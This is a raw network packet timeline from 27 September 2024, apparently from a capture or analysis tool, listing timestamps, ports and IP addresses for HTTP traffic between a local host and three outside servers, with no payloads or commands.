Sep 27, 2024 04:21:16.068866014 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.068943024 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.068953991 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.068959951 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.068964958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.068974972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.068984985 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.068995953 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.069008112 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.069057941 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069081068 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.069103003 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.069113970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.069123030 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.069133997 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.069144011 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.069156885 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.069158077 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.069164991 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069169044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069176912 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.069180012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069196939 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.069236994 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069269896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069281101 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069292068 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069313049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069334030 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069351912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069361925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069371939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069381952 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069391966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069411039 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069411039 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069495916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069508076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069516897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069528103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069538116 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069545031 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069545031 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069550037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069561958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069569111 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069574118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069585085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069602013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069602013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069657087 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069662094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069674969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069684029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.069725990 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.069725990 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.082199097 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.082217932 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.082237959 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.082248926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.082257986 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.082269907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.082277060 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.082333088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.082335949 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.082335949 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.082345963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.082389116 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.082427025 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.085285902 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.085330009 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.090138912 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.090202093 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.090210915 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.090241909 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.090250969 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.090382099 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.090392113 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.094420910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094492912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094502926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094512939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094523907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094522953 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094537973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094549894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094554901 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094554901 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094563961 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094588041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094599009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094600916 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094600916 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094631910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094661951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094672918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094682932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094692945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094702005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094702005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094707012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094717979 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094723940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094752073 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094752073 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094773054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094845057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094855070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094866037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094870090 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094899893 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094902992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094914913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094924927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094937086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.094954014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094954014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.094989061 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.095036983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.095098972 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.095129013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.095140934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.095149994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.095160007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.095175982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.095187902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.095199108 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.095199108 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.095216990 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.095257044 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.095626116 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.095676899 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.098057032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.098067999 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.098078012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.098124027 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.098146915 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.098160028 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.098160028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.098175049 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.098186970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.098196983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.098225117 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.098403931 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.115423918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.115518093 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.115573883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.115586042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.115596056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.115607023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.115617990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.115633011 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.115655899 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.115684032 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.115722895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.115735054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.115788937 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.115788937 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.116899014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.116914988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.116926908 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.116947889 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.117033005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.117058039 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.117070913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.117079973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.117093086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.117121935 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.117121935 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.117749929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.122562885 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.122584105 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.122596025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.122633934 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.122664928 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.122689009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.122700930 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.122710943 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.122721910 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.122745037 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.122770071 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.122864008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.122874975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.122924089 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.123428106 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.123440027 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.123450994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.123488903 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.123512983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.123562098 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.123574018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.123586893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.123598099 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.123613119 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.123636961 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.123656988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.123919010 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.123975039 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.125694036 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.125757933 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.125825882 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.125837088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.125848055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.125859022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.125880957 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.125905037 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126008987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126022100 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126030922 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126043081 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126053095 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126065969 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126075983 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126089096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126089096 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126108885 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126110077 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126121998 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126130104 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126166105 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126211882 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126224041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126234055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126243114 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126254082 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126265049 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126291990 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126291990 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126385927 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126404047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126415014 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126425028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126441002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126444101 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126451969 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126463890 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126463890 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126476049 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126487970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126497984 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126499891 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126518965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126529932 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126532078 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126532078 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126540899 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126565933 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126565933 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126578093 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126588106 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126605988 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126609087 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126616955 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126630068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126630068 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126641035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126652002 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126652956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126665115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126673937 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126677990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126689911 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126693964 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126707077 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126720905 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126723051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126737118 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126748085 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126750946 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126758099 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126770973 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126770973 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126784086 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126795053 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126796007 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126811028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126826048 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126841068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126852036 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126854897 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126883030 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126885891 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126899004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126904011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126910925 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.126969099 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.126969099 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.127262115 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.132425070 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132473946 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132483959 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132484913 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.132523060 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.132531881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132544041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132544041 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.132555962 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132567883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132581949 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.132601976 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.132625103 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.132657051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132668972 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132678986 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132688999 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132699966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132721901 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.132747889 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.132778883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132791042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132800102 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.132824898 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.132941008 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.152868986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.152966022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.152978897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.152985096 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.152991056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.153002977 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.153011084 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.153013945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.153027058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.153038025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.153047085 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.153079033 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.153116941 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.154356003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.154366970 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.154377937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.154407978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.154407978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.154522896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.154535055 CEST	80	49725	185.215.113.117	192.168.2.5
